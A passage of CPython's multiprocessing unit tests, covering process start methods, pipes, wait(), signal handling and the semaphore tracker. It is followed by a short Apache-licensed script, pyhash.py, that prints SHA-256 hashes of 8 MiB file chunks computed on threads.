time.sleep(4.0) # Wait a bit to trigger race condition
finish = True
if exc is not None:
raise exc
finally:
sys.setswitchinterval(old_interval)
gc.set_threshold(*old_threshold)
gc.collect() # Collect remaining Foo's
#
# Test that from ... import * works for each module
#
class _TestImportStar(unittest.TestCase):
def get_module_names(self):
import glob
folder = os.path.dirname(multiprocessing.__file__)
pattern = os.path.join(folder, '*.py')
files = glob.glob(pattern)
modules = [os.path.splitext(os.path.split(f)[1])[0] for f in files]
modules = ['multiprocessing.' + m for m in modules]
modules.remove('multiprocessing.__init__')
modules.append('multiprocessing')
return modules
def test_import(self):
modules = self.get_module_names()
if sys.platform == 'win32':
modules.remove('multiprocessing.popen_fork')
modules.remove('multiprocessing.popen_forkserver')
modules.remove('multiprocessing.popen_spawn_posix')
else:
modules.remove('multiprocessing.popen_spawn_win32')
if not HAS_REDUCTION:
modules.remove('multiprocessing.popen_forkserver')
if c_int is None:
# This module requires _ctypes
modules.remove('multiprocessing.sharedctypes')
for name in modules:
__import__(name)
mod = sys.modules[name]
self.assertTrue(hasattr(mod, '__all__'), name)
for attr in mod.__all__:
self.assertTrue(
hasattr(mod, attr),
'%r does not have attribute %r' % (mod, attr)
)
#
# Quick test that logging works -- does not test logging output
#
class _TestLogging(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def test_enable_logging(self):
logger = multiprocessing.get_logger()
logger.setLevel(util.SUBWARNING)
self.assertTrue(logger is not None)
logger.debug('this will not be printed')
logger.info('nor will this')
logger.setLevel(LOG_LEVEL)
@classmethod
def _test_level(cls, conn):
logger = multiprocessing.get_logger()
conn.send(logger.getEffectiveLevel())
def test_level(self):
LEVEL1 = 32
LEVEL2 = 37
logger = multiprocessing.get_logger()
root_logger = logging.getLogger()
root_level = root_logger.level
reader, writer = multiprocessing.Pipe(duplex=False)
logger.setLevel(LEVEL1)
p = self.Process(target=self._test_level, args=(writer,))
p.start()
self.assertEqual(LEVEL1, reader.recv())
p.join()
p.close()
logger.setLevel(logging.NOTSET)
root_logger.setLevel(LEVEL2)
p = self.Process(target=self._test_level, args=(writer,))
p.start()
self.assertEqual(LEVEL2, reader.recv())
p.join()
p.close()
root_logger.setLevel(root_level)
logger.setLevel(level=LOG_LEVEL)
# class _TestLoggingProcessName(BaseTestCase):
#
# def handle(self, record):
# assert record.processName == multiprocessing.current_process().name
# self.__handled = True
#
# def test_logging(self):
# handler = logging.Handler()
# handler.handle = self.handle
# self.__handled = False
# # Bypass getLogger() and side-effects
# logger = logging.getLoggerClass()(
# 'multiprocessing.test.TestLoggingProcessName')
# logger.addHandler(handler)
# logger.propagate = False
#
# logger.warn('foo')
# assert self.__handled
#
# Check that Process.join() retries if os.waitpid() fails with EINTR
#
class _TestPollEintr(BaseTestCase):
ALLOWED_TYPES = ('processes',)
@classmethod
def _killer(cls, pid):
time.sleep(0.1)
os.kill(pid, signal.SIGUSR1)
@unittest.skipUnless(hasattr(signal, 'SIGUSR1'), 'requires SIGUSR1')
def test_poll_eintr(self):
got_signal = [False]
def record(*args):
got_signal[0] = True
pid = os.getpid()
oldhandler = signal.signal(signal.SIGUSR1, record)
try:
killer = self.Process(target=self._killer, args=(pid,))
killer.start()
try:
p = self.Process(target=time.sleep, args=(2,))
p.start()
p.join()
finally:
killer.join()
self.assertTrue(got_signal[0])
self.assertEqual(p.exitcode, 0)
finally:
signal.signal(signal.SIGUSR1, oldhandler)
#
# Test to verify handle verification, see issue 3321
#
class TestInvalidHandle(unittest.TestCase):
@unittest.skipIf(WIN32, "skipped on Windows")
def test_invalid_handles(self):
conn = multiprocessing.connection.Connection(44977608)
# check that poll() doesn't crash
try:
conn.poll()
except (ValueError, OSError):
pass
finally:
# Hack private attribute _handle to avoid printing an error
# in conn.__del__
conn._handle = None
self.assertRaises((ValueError, OSError),
multiprocessing.connection.Connection, -1)
class OtherTest(unittest.TestCase):
# TODO: add more tests for deliver/answer challenge.
def test_deliver_challenge_auth_failure(self):
class _FakeConnection(object):
def recv_bytes(self, size):
return b'something bogus'
def send_bytes(self, data):
pass
self.assertRaises(multiprocessing.AuthenticationError,
multiprocessing.connection.deliver_challenge,
_FakeConnection(), b'abc')
def test_answer_challenge_auth_failure(self):
class _FakeConnection(object):
def __init__(self):
self.count = 0
def recv_bytes(self, size):
self.count += 1
if self.count == 1:
return multiprocessing.connection.CHALLENGE
elif self.count == 2:
return b'something bogus'
return b''
def send_bytes(self, data):
pass
self.assertRaises(multiprocessing.AuthenticationError,
multiprocessing.connection.answer_challenge,
_FakeConnection(), b'abc')
#
# Test Manager.start()/Pool.__init__() initializer feature - see issue 5585
#
def initializer(ns):
ns.test += 1
class TestInitializers(unittest.TestCase):
def setUp(self):
self.mgr = multiprocessing.Manager()
self.ns = self.mgr.Namespace()
self.ns.test = 0
def tearDown(self):
self.mgr.shutdown()
self.mgr.join()
def test_manager_initializer(self):
m = multiprocessing.managers.SyncManager()
self.assertRaises(TypeError, m.start, 1)
m.start(initializer, (self.ns,))
self.assertEqual(self.ns.test, 1)
m.shutdown()
m.join()
def test_pool_initializer(self):
self.assertRaises(TypeError, multiprocessing.Pool, initializer=1)
p = multiprocessing.Pool(1, initializer, (self.ns,))
p.close()
p.join()
self.assertEqual(self.ns.test, 1)
#
# Issue 5155, 5313, 5331: Test process in processes
# Verifies os.close(sys.stdin.fileno) vs. sys.stdin.close() behavior
#
def _this_sub_process(q):
try:
item = q.get(block=False)
except pyqueue.Empty:
pass
def _test_process():
queue = multiprocessing.Queue()
subProc = multiprocessing.Process(target=_this_sub_process, args=(queue,))
subProc.daemon = True
subProc.start()
subProc.join()
def _afunc(x):
return x*x
def pool_in_process():
pool = multiprocessing.Pool(processes=4)
x = pool.map(_afunc, [1, 2, 3, 4, 5, 6, 7])
pool.close()
pool.join()
class _file_like(object):
def __init__(self, delegate):
self._delegate = delegate
self._pid = None
@property
def cache(self):
pid = os.getpid()
# There are no race conditions since fork keeps only the running thread
if pid != self._pid:
self._pid = pid
self._cache = []
return self._cache
def write(self, data):
self.cache.append(data)
def flush(self):
self._delegate.write(''.join(self.cache))
self._cache = []
class TestStdinBadfiledescriptor(unittest.TestCase):
def test_queue_in_process(self):
proc = multiprocessing.Process(target=_test_process)
proc.start()
proc.join()
def test_pool_in_process(self):
p = multiprocessing.Process(target=pool_in_process)
p.start()
p.join()
def test_flushing(self):
sio = io.StringIO()
flike = _file_like(sio)
flike.write('foo')
proc = multiprocessing.Process(target=lambda: flike.flush())
flike.flush()
assert sio.getvalue() == 'foo'
class TestWait(unittest.TestCase):
@classmethod
def _child_test_wait(cls, w, slow):
for i in range(10):
if slow:
time.sleep(random.random()*0.1)
w.send((i, os.getpid()))
w.close()
def test_wait(self, slow=False):
from multiprocessing.connection import wait
readers = []
procs = []
messages = []
for i in range(4):
r, w = multiprocessing.Pipe(duplex=False)
p = multiprocessing.Process(target=self._child_test_wait, args=(w, slow))
p.daemon = True
p.start()
w.close()
readers.append(r)
procs.append(p)
self.addCleanup(p.join)
while readers:
for r in wait(readers):
try:
msg = r.recv()
except EOFError:
readers.remove(r)
r.close()
else:
messages.append(msg)
messages.sort()
expected = sorted((i, p.pid) for i in range(10) for p in procs)
self.assertEqual(messages, expected)
@classmethod
def _child_test_wait_socket(cls, address, slow):
s = socket.socket()
s.connect(address)
for i in range(10):
if slow:
time.sleep(random.random()*0.1)
s.sendall(('%s\n' % i).encode('ascii'))
s.close()
def test_wait_socket(self, slow=False):
from multiprocessing.connection import wait
l = socket.socket()
l.bind((test.support.HOST, 0))
l.listen()
addr = l.getsockname()
readers = []
procs = []
dic = {}
for i in range(4):
p = multiprocessing.Process(target=self._child_test_wait_socket,
args=(addr, slow))
p.daemon = True
p.start()
procs.append(p)
self.addCleanup(p.join)
for i in range(4):
r, _ = l.accept()
readers.append(r)
dic[r] = []
l.close()
while readers:
for r in wait(readers):
msg = r.recv(32)
if not msg:
readers.remove(r)
r.close()
else:
dic[r].append(msg)
expected = ''.join('%s\n' % i for i in range(10)).encode('ascii')
for v in dic.values():
self.assertEqual(b''.join(v), expected)
def test_wait_slow(self):
self.test_wait(True)
def test_wait_socket_slow(self):
self.test_wait_socket(True)
def test_wait_timeout(self):
from multiprocessing.connection import wait
expected = 5
a, b = multiprocessing.Pipe()
start = time.time()
res = wait([a, b], expected)
delta = time.time() - start
self.assertEqual(res, [])
self.assertLess(delta, expected * 2)
self.assertGreater(delta, expected * 0.5)
b.send(None)
start = time.time()
res = wait([a, b], 20)
delta = time.time() - start
self.assertEqual(res, [a])
self.assertLess(delta, 0.4)
@classmethod
def signal_and_sleep(cls, sem, period):
sem.release()
time.sleep(period)
def test_wait_integer(self):
from multiprocessing.connection import wait
expected = 3
sorted_ = lambda l: sorted(l, key=lambda x: id(x))
sem = multiprocessing.Semaphore(0)
a, b = multiprocessing.Pipe()
p = multiprocessing.Process(target=self.signal_and_sleep,
args=(sem, expected))
p.start()
self.assertIsInstance(p.sentinel, int)
self.assertTrue(sem.acquire(timeout=20))
start = time.time()
res = wait([a, p.sentinel, b], expected + 20)
delta = time.time() - start
self.assertEqual(res, [p.sentinel])
self.assertLess(delta, expected + 2)
self.assertGreater(delta, expected - 2)
a.send(None)
start = time.time()
res = wait([a, p.sentinel, b], 20)
delta = time.time() - start
self.assertEqual(sorted_(res), sorted_([p.sentinel, b]))
self.assertLess(delta, 0.4)
b.send(None)
start = time.time()
res = wait([a, p.sentinel, b], 20)
delta = time.time() - start
self.assertEqual(sorted_(res), sorted_([a, p.sentinel, b]))
self.assertLess(delta, 0.4)
p.terminate()
p.join()
def test_neg_timeout(self):
from multiprocessing.connection import wait
a, b = multiprocessing.Pipe()
t = time.time()
res = wait([a], timeout=-1)
t = time.time() - t
self.assertEqual(res, [])
self.assertLess(t, 1)
a.close()
b.close()
#
# Issue 14151: Test invalid family on invalid environment
#
class TestInvalidFamily(unittest.TestCase):
@unittest.skipIf(WIN32, "skipped on Windows")
def test_invalid_family(self):
with self.assertRaises(ValueError):
multiprocessing.connection.Listener(r'\\.\test')
@unittest.skipUnless(WIN32, "skipped on non-Windows platforms")
def test_invalid_family_win32(self):
with self.assertRaises(ValueError):
multiprocessing.connection.Listener('/var/test.pipe')
#
# Issue 12098: check sys.flags of child matches that for parent
#
class TestFlags(unittest.TestCase):
@classmethod
def run_in_grandchild(cls, conn):
conn.send(tuple(sys.flags))
@classmethod
def run_in_child(cls):
import json
r, w = multiprocessing.Pipe(duplex=False)
p = multiprocessing.Process(target=cls.run_in_grandchild, args=(w,))
p.start()
grandchild_flags = r.recv()
p.join()
r.close()
w.close()
flags = (tuple(sys.flags), grandchild_flags)
print(json.dumps(flags))
def test_flags(self):
import json, subprocess
# start child process using unusual flags
prog = ('from test._test_multiprocessing import TestFlags; ' +
'TestFlags.run_in_child()')
data = subprocess.check_output(
[sys.executable, '-E', '-S', '-O', '-c', prog])
child_flags, grandchild_flags = json.loads(data.decode('ascii'))
self.assertEqual(child_flags, grandchild_flags)
#
# Test interaction with socket timeouts - see Issue #6056
#
class TestTimeouts(unittest.TestCase):
@classmethod
def _test_timeout(cls, child, address):
time.sleep(1)
child.send(123)
child.close()
conn = multiprocessing.connection.Client(address)
conn.send(456)
conn.close()
def test_timeout(self):
old_timeout = socket.getdefaulttimeout()
try:
socket.setdefaulttimeout(0.1)
parent, child = multiprocessing.Pipe(duplex=True)
l = multiprocessing.connection.Listener(family='AF_INET')
p = multiprocessing.Process(target=self._test_timeout,
args=(child, l.address))
p.start()
child.close()
self.assertEqual(parent.recv(), 123)
parent.close()
conn = l.accept()
self.assertEqual(conn.recv(), 456)
conn.close()
l.close()
join_process(p)
finally:
socket.setdefaulttimeout(old_timeout)
#
# Test what happens with no "if __name__ == '__main__'"
#
class TestNoForkBomb(unittest.TestCase):
def test_noforkbomb(self):
sm = multiprocessing.get_start_method()
name = os.path.join(os.path.dirname(__file__), 'mp_fork_bomb.py')
if sm != 'fork':
rc, out, err = test.support.script_helper.assert_python_failure(name, sm)
self.assertEqual(out, b'')
self.assertIn(b'RuntimeError', err)
else:
rc, out, err = test.support.script_helper.assert_python_ok(name, sm)
self.assertEqual(out.rstrip(), b'123')
self.assertEqual(err, b'')
#
# Issue #17555: ForkAwareThreadLock
#
class TestForkAwareThreadLock(unittest.TestCase):
# We recursively start processes. Issue #17555 meant that the
# after fork registry would get duplicate entries for the same
# lock. The size of the registry at generation n was ~2**n.
@classmethod
def child(cls, n, conn):
if n > 1:
p = multiprocessing.Process(target=cls.child, args=(n-1, conn))
p.start()
conn.close()
join_process(p)
else:
conn.send(len(util._afterfork_registry))
conn.close()
def test_lock(self):
r, w = multiprocessing.Pipe(False)
l = util.ForkAwareThreadLock()
old_size = len(util._afterfork_registry)
p = multiprocessing.Process(target=self.child, args=(5, w))
p.start()
w.close()
new_size = r.recv()
join_process(p)
self.assertLessEqual(new_size, old_size)
#
# Check that non-forked child processes do not inherit unneeded fds/handles
#
class TestCloseFds(unittest.TestCase):
def get_high_socket_fd(self):
if WIN32:
# The child process will not have any socket handles, so
# calling socket.fromfd() should produce WSAENOTSOCK even
# if there is a handle of the same number.
return socket.socket().detach()
else:
# We want to produce a socket with an fd high enough that a
# freshly created child process will not have any fds as high.
fd = socket.socket().detach()
to_close = []
while fd < 50:
to_close.append(fd)
fd = os.dup(fd)
for x in to_close:
os.close(x)
return fd
def close(self, fd):
if WIN32:
socket.socket(socket.AF_INET, socket.SOCK_STREAM, fileno=fd).close()
else:
os.close(fd)
@classmethod
def _test_closefds(cls, conn, fd):
try:
s = socket.fromfd(fd, socket.AF_INET, socket.SOCK_STREAM)
except Exception as e:
conn.send(e)
else:
s.close()
conn.send(None)
def test_closefd(self):
if not HAS_REDUCTION:
raise unittest.SkipTest('requires fd pickling')
reader, writer = multiprocessing.Pipe()
fd = self.get_high_socket_fd()
try:
p = multiprocessing.Process(target=self._test_closefds,
args=(writer, fd))
p.start()
writer.close()
e = reader.recv()
join_process(p)
finally:
self.close(fd)
writer.close()
reader.close()
if multiprocessing.get_start_method() == 'fork':
self.assertIs(e, None)
else:
WSAENOTSOCK = 10038
self.assertIsInstance(e, OSError)
self.assertTrue(e.errno == errno.EBADF or
e.winerror == WSAENOTSOCK, e)
#
# Issue #17097: EINTR should be ignored by recv(), send(), accept() etc
#
class TestIgnoreEINTR(unittest.TestCase):
# Sending CONN_MAX_SIZE bytes into a multiprocessing pipe must block
CONN_MAX_SIZE = max(support.PIPE_MAX_SIZE, support.SOCK_MAX_SIZE)
@classmethod
def _test_ignore(cls, conn):
def handler(signum, frame):
pass
signal.signal(signal.SIGUSR1, handler)
conn.send('ready')
x = conn.recv()
conn.send(x)
conn.send_bytes(b'x' * cls.CONN_MAX_SIZE)
@unittest.skipUnless(hasattr(signal, 'SIGUSR1'), 'requires SIGUSR1')
def test_ignore(self):
conn, child_conn = multiprocessing.Pipe()
try:
p = multiprocessing.Process(target=self._test_ignore,
args=(child_conn,))
p.daemon = True
p.start()
child_conn.close()
self.assertEqual(conn.recv(), 'ready')
time.sleep(0.1)
os.kill(p.pid, signal.SIGUSR1)
time.sleep(0.1)
conn.send(1234)
self.assertEqual(conn.recv(), 1234)
time.sleep(0.1)
os.kill(p.pid, signal.SIGUSR1)
self.assertEqual(conn.recv_bytes(), b'x' * self.CONN_MAX_SIZE)
time.sleep(0.1)
p.join()
finally:
conn.close()
@classmethod
def _test_ignore_listener(cls, conn):
def handler(signum, frame):
pass
signal.signal(signal.SIGUSR1, handler)
with multiprocessing.connection.Listener() as l:
conn.send(l.address)
a = l.accept()
a.send('welcome')
@unittest.skipUnless(hasattr(signal, 'SIGUSR1'), 'requires SIGUSR1')
def test_ignore_listener(self):
conn, child_conn = multiprocessing.Pipe()
try:
p = multiprocessing.Process(target=self._test_ignore_listener,
args=(child_conn,))
p.daemon = True
p.start()
child_conn.close()
address = conn.recv()
time.sleep(0.1)
os.kill(p.pid, signal.SIGUSR1)
time.sleep(0.1)
client = multiprocessing.connection.Client(address)
self.assertEqual(client.recv(), 'welcome')
p.join()
finally:
conn.close()
class TestStartMethod(unittest.TestCase):
@classmethod
def _check_context(cls, conn):
conn.send(multiprocessing.get_start_method())
def check_context(self, ctx):
r, w = ctx.Pipe(duplex=False)
p = ctx.Process(target=self._check_context, args=(w,))
p.start()
w.close()
child_method = r.recv()
r.close()
p.join()
self.assertEqual(child_method, ctx.get_start_method())
def test_context(self):
for method in ('fork', 'spawn', 'forkserver'):
try:
ctx = multiprocessing.get_context(method)
except ValueError:
continue
self.assertEqual(ctx.get_start_method(), method)
self.assertIs(ctx.get_context(), ctx)
self.assertRaises(ValueError, ctx.set_start_method, 'spawn')
self.assertRaises(ValueError, ctx.set_start_method, None)
self.check_context(ctx)
def test_set_get(self):
multiprocessing.set_forkserver_preload(PRELOAD)
count = 0
old_method = multiprocessing.get_start_method()
try:
for method in ('fork', 'spawn', 'forkserver'):
try:
multiprocessing.set_start_method(method, force=True)
except ValueError:
continue
self.assertEqual(multiprocessing.get_start_method(), method)
ctx = multiprocessing.get_context()
self.assertEqual(ctx.get_start_method(), method)
self.assertTrue(type(ctx).__name__.lower().startswith(method))
self.assertTrue(
ctx.Process.__name__.lower().startswith(method))
self.check_context(multiprocessing)
count += 1
finally:
multiprocessing.set_start_method(old_method, force=True)
self.assertGreaterEqual(count, 1)
def test_get_all(self):
methods = multiprocessing.get_all_start_methods()
if sys.platform == 'win32':
self.assertEqual(methods, ['spawn'])
else:
self.assertTrue(methods == ['fork', 'spawn'] or
methods == ['fork', 'spawn', 'forkserver'])
def test_preload_resources(self):
if multiprocessing.get_start_method() != 'forkserver':
self.skipTest("test only relevant for 'forkserver' method")
name = os.path.join(os.path.dirname(__file__), 'mp_preload.py')
rc, out, err = test.support.script_helper.assert_python_ok(name)
out = out.decode()
err = err.decode()
if out.rstrip() != 'ok' or err != '':
print(out)
print(err)
self.fail("failed spawning forkserver or grandchild")
@unittest.skipIf(sys.platform == "win32",
"test semantics don't make sense on Windows")
class TestSemaphoreTracker(unittest.TestCase):
def test_semaphore_tracker(self):
#
# Check that killing process does not leak named semaphores
#
import subprocess
cmd = '''if 1:
import multiprocessing as mp, time, os
mp.set_start_method("spawn")
lock1 = mp.Lock()
lock2 = mp.Lock()
os.write(%d, lock1._semlock.name.encode("ascii") + b"\\n")
os.write(%d, lock2._semlock.name.encode("ascii") + b"\\n")
time.sleep(10)
'''
r, w = os.pipe()
p = subprocess.Popen([sys.executable,
'-E', '-c', cmd % (w, w)],
pass_fds=[w],
stderr=subprocess.PIPE)
os.close(w)
with open(r, 'rb', closefd=True) as f:
name1 = f.readline().rstrip().decode('ascii')
name2 = f.readline().rstrip().decode('ascii')
_multiprocessing.sem_unlink(name1)
p.terminate()
p.wait()
time.sleep(2.0)
with self.assertRaises(OSError) as ctx:
_multiprocessing.sem_unlink(name2)
# docs say it should be ENOENT, but OSX seems to give EINVAL
self.assertIn(ctx.exception.errno, (errno.ENOENT, errno.EINVAL))
err = p.stderr.read().decode('utf-8')
p.stderr.close()
expected = 'semaphore_tracker: There appear to be 2 leaked semaphores'
self.assertRegex(err, expected)
self.assertRegex(err, r'semaphore_tracker: %r: \[Errno' % name1)
def check_semaphore_tracker_death(self, signum, should_die):
# bpo-31310: if the semaphore tracker process has died, it should
# be restarted implicitly.
from multiprocessing.semaphore_tracker import _semaphore_tracker
_semaphore_tracker.ensure_running()
pid = _semaphore_tracker._pid
os.kill(pid, signum)
time.sleep(1.0) # give it time to die
ctx = multiprocessing.get_context("spawn")
with contextlib.ExitStack() as stack:
if should_die:
stack.enter_context(self.assertWarnsRegex(
UserWarning,
"semaphore_tracker: process died"))
sem = ctx.Semaphore()
sem.acquire()
sem.release()
wr = weakref.ref(sem)
# ensure `sem` gets collected, which triggers communication with
# the semaphore tracker
del sem
gc.collect()
self.assertIsNone(wr())
def test_semaphore_tracker_sigint(self):
# Catchable signal (ignored by semaphore tracker)
self.check_semaphore_tracker_death(signal.SIGINT, False)
def test_semaphore_tracker_sigkill(self):
# Uncatchable signal.
self.check_semaphore_tracker_death(signal.SIGKILL, True)
class TestSimpleQueue(unittest.TestCase):
@classmethod
def _test_empty(cls, queue, child_can_start, parent_can_continue):
child_can_start.wait()
# issue 30301, could fail under spawn and forkserver
try:
queue.put(queue.empty())
queue.put(queue.empty())
finally:
parent_can_continue.set()
def test_empty(self):
queue = multiprocessing.SimpleQueue()
child_can_start = multiprocessing.Event()
parent_can_continue = multiprocessing.Event()
proc = multiprocessing.Process(
target=self._test_empty,
args=(queue, child_can_start, parent_can_continue)
)
proc.daemon = True
proc.start()
self.assertTrue(queue.empty())
child_can_start.set()
parent_can_continue.wait()
self.assertFalse(queue.empty())
self.assertEqual(queue.get(), True)
self.assertEqual(queue.get(), False)
self.assertTrue(queue.empty())
proc.join()
#
# Mixins
#
class BaseMixin(object):
@classmethod
def setUpClass(cls):
cls.dangling = (multiprocessing.process._dangling.copy(),
threading._dangling.copy())
@classmethod
def tearDownClass(cls):
# bpo-26762: Some multiprocessing objects like Pool create reference
# cycles. Trigger a garbage collection to break these cycles.
test.support.gc_collect()
processes = set(multiprocessing.process._dangling) - set(cls.dangling[0])
if processes:
test.support.environment_altered = True
print('Warning -- Dangling processes: %s' % processes,
file=sys.stderr)
processes = None
threads = set(threading._dangling) - set(cls.dangling[1])
if threads:
test.support.environment_altered = True
print('Warning -- Dangling threads: %s' % threads,
file=sys.stderr)
threads = None
class ProcessesMixin(BaseMixin):
TYPE = 'processes'
Process = multiprocessing.Process
connection = multiprocessing.connection
current_process = staticmethod(multiprocessing.current_process)
active_children = staticmethod(multiprocessing.active_children)
Pool = staticmethod(multiprocessing.Pool)
Pipe = staticmethod(multiprocessing.Pipe)
Queue = staticmethod(multiprocessing.Queue)
JoinableQueue = staticmethod(multiprocessing.JoinableQueue)
Lock = staticmethod(multiprocessing.Lock)
RLock = staticmethod(multiprocessing.RLock)
Semaphore = staticmethod(multiprocessing.Semaphore)
BoundedSemaphore = staticmethod(multiprocessing.BoundedSemaphore)
Condition = staticmethod(multiprocessing.Condition)
Event = staticmethod(multiprocessing.Event)
Barrier = staticmethod(multiprocessing.Barrier)
Value = staticmethod(multiprocessing.Value)
Array = staticmethod(multiprocessing.Array)
RawValue = staticmethod(multiprocessing.RawValue)
RawArray = staticmethod(multiprocessing.RawArray)
class ManagerMixin(BaseMixin):
TYPE = 'manager'
Process = multiprocessing.Process
Queue = property(operator.attrgetter('manager.Queue'))
JoinableQueue = property(operator.attrgetter('manager.JoinableQueue'))
Lock = property(operator.attrgetter('manager.Lock'))
RLock = property(operator.attrgetter('manager.RLock'))
Semaphore = property(operator.attrgetter('manager.Semaphore'))
BoundedSemaphore = property(operator.attrgetter('manager.BoundedSemaphore'))
Condition = property(operator.attrgetter('manager.Condition'))
Event = property(operator.attrgetter('manager.Event'))
Barrier = property(operator.attrgetter('manager.Barrier'))
Value = property(operator.attrgetter('manager.Value'))
Array = property(operator.attrgetter('manager.Array'))
list = property(operator.attrgetter('manager.list'))
dict = property(operator.attrgetter('manager.dict'))
Namespace = property(operator.attrgetter('manager.Namespace'))
@classmethod
def Pool(cls, *args, **kwds):
return cls.manager.Pool(*args, **kwds)
@classmethod
def setUpClass(cls):
super().setUpClass()
cls.manager = multiprocessing.Manager()
@classmethod
def tearDownClass(cls):
# only the manager process should be returned by active_children()
# but this can take a bit on slow machines, so wait a few seconds
# if there are other children too (see #17395)
start_time = time.monotonic()
t = 0.01
while len(multiprocessing.active_children()) > 1:
time.sleep(t)
t *= 2
dt = time.monotonic() - start_time
if dt >= 5.0:
test.support.environment_altered = True
print("Warning -- multiprocessing.Manager still has %s active "
"children after %s seconds"
% (multiprocessing.active_children(), dt),
file=sys.stderr)
break
gc.collect() # do garbage collection
if cls.manager._number_of_objects() != 0:
# This is not really an error since some tests do not
# ensure that all processes which hold a reference to a
# managed object have been joined.
test.support.environment_altered = True
print('Warning -- Shared objects which still exist at manager '
'shutdown:')
print(cls.manager._debug_info())
cls.manager.shutdown()
cls.manager.join()
cls.manager = None
super().tearDownClass()
class ThreadsMixin(BaseMixin):
TYPE = 'threads'
Process = multiprocessing.dummy.Process
connection = multiprocessing.dummy.connection
current_process = staticmethod(multiprocessing.dummy.current_process)
active_children = staticmethod(multiprocessing.dummy.active_children)
Pool = staticmethod(multiprocessing.dummy.Pool)
Pipe = staticmethod(multiprocessing.dummy.Pipe)
Queue = staticmethod(multiprocessing.dummy.Queue)
JoinableQueue = staticmethod(multiprocessing.dummy.JoinableQueue)
Lock = staticmethod(multiprocessing.dummy.Lock)
RLock = staticmethod(multiprocessing.dummy.RLock)
Semaphore = staticmethod(multiprocessing.dummy.Semaphore)
BoundedSemaphore = staticmethod(multiprocessing.dummy.BoundedSemaphore)
Condition = staticmethod(multiprocessing.dummy.Condition)
Event = staticmethod(multiprocessing.dummy.Event)
Barrier = staticmethod(multiprocessing.dummy.Barrier)
Value = staticmethod(multiprocessing.dummy.Value)
Array = staticmethod(multiprocessing.dummy.Array)
#
# Functions used to create test cases from the base ones in this module
#
def install_tests_in_module_dict(remote_globs, start_method):
__module__ = remote_globs['__name__']
local_globs = globals()
ALL_TYPES = {'processes', 'threads', 'manager'}
for name, base in local_globs.items():
if not isinstance(base, type):
continue
if issubclass(base, BaseTestCase):
if base is BaseTestCase:
continue
assert set(base.ALLOWED_TYPES) <= ALL_TYPES, base.ALLOWED_TYPES
for type_ in base.ALLOWED_TYPES:
newname = 'With' + type_.capitalize() + name[1:]
Mixin = local_globs[type_.capitalize() + 'Mixin']
class Temp(base, Mixin, unittest.TestCase):
pass
Temp.__name__ = Temp.__qualname__ = newname
Temp.__module__ = __module__
remote_globs[newname] = Temp
elif issubclass(base, unittest.TestCase):
class Temp(base, object):
pass
Temp.__name__ = Temp.__qualname__ = name
Temp.__module__ = __module__
remote_globs[name] = Temp
dangling = [None, None]
old_start_method = [None]
def setUpModule():
multiprocessing.set_forkserver_preload(PRELOAD)
multiprocessing.process._cleanup()
dangling[0] = multiprocessing.process._dangling.copy()
dangling[1] = threading._dangling.copy()
old_start_method[0] = multiprocessing.get_start_method(allow_none=True)
try:
multiprocessing.set_start_method(start_method, force=True)
except ValueError:
raise unittest.SkipTest(start_method +
' start method not supported')
if sys.platform.startswith("linux"):
try:
lock = multiprocessing.RLock()
except OSError:
raise unittest.SkipTest("OSError raises on RLock creation, "
"see issue 3111!")
check_enough_semaphores()
util.get_temp_dir() # creates temp directory
multiprocessing.get_logger().setLevel(LOG_LEVEL)
def tearDownModule():
need_sleep = False
# bpo-26762: Some multiprocessing objects like Pool create reference
# cycles. Trigger a garbage collection to break these cycles.
test.support.gc_collect()
multiprocessing.set_start_method(old_start_method[0], force=True)
# pause a bit so we don't get warning about dangling threads/processes
processes = set(multiprocessing.process._dangling) - set(dangling[0])
if processes:
need_sleep = True
test.support.environment_altered = True
print('Warning -- Dangling processes: %s' % processes,
file=sys.stderr)
processes = None
threads = set(threading._dangling) - set(dangling[1])
if threads:
need_sleep = True
test.support.environment_altered = True
print('Warning -- Dangling threads: %s' % threads,
file=sys.stderr)
threads = None
# Sleep 500 ms to give time to child processes to complete.
if need_sleep:
time.sleep(0.5)
multiprocessing.process._cleanup()
test.support.gc_collect()
remote_globs['setUpModule'] = setUpModule
remote_globs['tearDownModule'] = tearDownModule
|
pyhash.py | #!/usr/bin/env python3
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Prints sha256 hashes of chunks of a file from the command line.
Chunks are at most 8M in size (last chunk can be smaller). Chunks are hashed
using separate threads (number of threads depends on the number on CPUs).
Performance will depend almost entirely on the ability of the filesystem to
read a file sequentially in large blocks, or on the ability of python to hash
large blocks efficiently.
On most operating systems, Python will defer sha256 checksum computation to
openssl that contains multiple very optimized implementations of the sha256
algorithm, and will opportunistically use whatever specialized cpu instructions
are available to it to perform this computation as quickly as possible.
Computing hashes at rates of multiple gygabytes per second on a laptop using
this code is not unheard of.
"""
import contextlib
import hashlib
import io
import multiprocessing
import queue
import sys
import threading
from concurrent import futures
from typing import TYPE_CHECKING, List, Optional, Tuple
_result = Tuple[int, bytes]
if TYPE_CHECKING:
_result_queue = queue.Queue[Optional[futures.Future[_result]]]
else:
_result_queue = queue.Queue
_CHUNK_SIZE = 8 << 20 # size in bytes: 8MiB
def compute_hash(buf: bytes) -> _result:
"""Uses all the cpu :)
According to documentation this should end up releasing the GIL,
so that we get to use more threads.
Attributes:
buf: data to hash, immutable - so there's hope in zerocopy here.
Returns:
block size and digest
"""
h = hashlib.sha256()
h.update(buf)
return len(buf), h.digest()
def read_file(
f: io.RawIOBase,
executor: futures.Executor,
q: _result_queue,
stop_reading: threading.Event,
):
try:
while not stop_reading.is_set():
# make a bytearray and try very hard to fill it.
buf = memoryview(bytearray(_CHUNK_SIZE))
ntotal: int = 0
nread: int = 1
while nread > 0:
# As of 2020-06-01: typeshed wrongly claims we can't
# `readinto(memoryview)`, so we disable type checking.
nread = f.readinto(buf[ntotal:]) or 0 # type: ignore
ntotal += nread
if ntotal == 0: # end of file when we can't fill any
return
q.put(executor.submit(compute_hash, buf[:ntotal]))
finally:
q.put(None) # signal end of queue to the printer
def print_hashes(q: _result_queue):
total_size = 0
while True:
hash_future = q.get()
if hash_future is None: # end of queue
break
length, hash = hash_future.result() # type int, bytes
print("offset: {}, hash: {}".format(total_size, hash.hex()))
total_size += length
print(f"Total size: {total_size}")
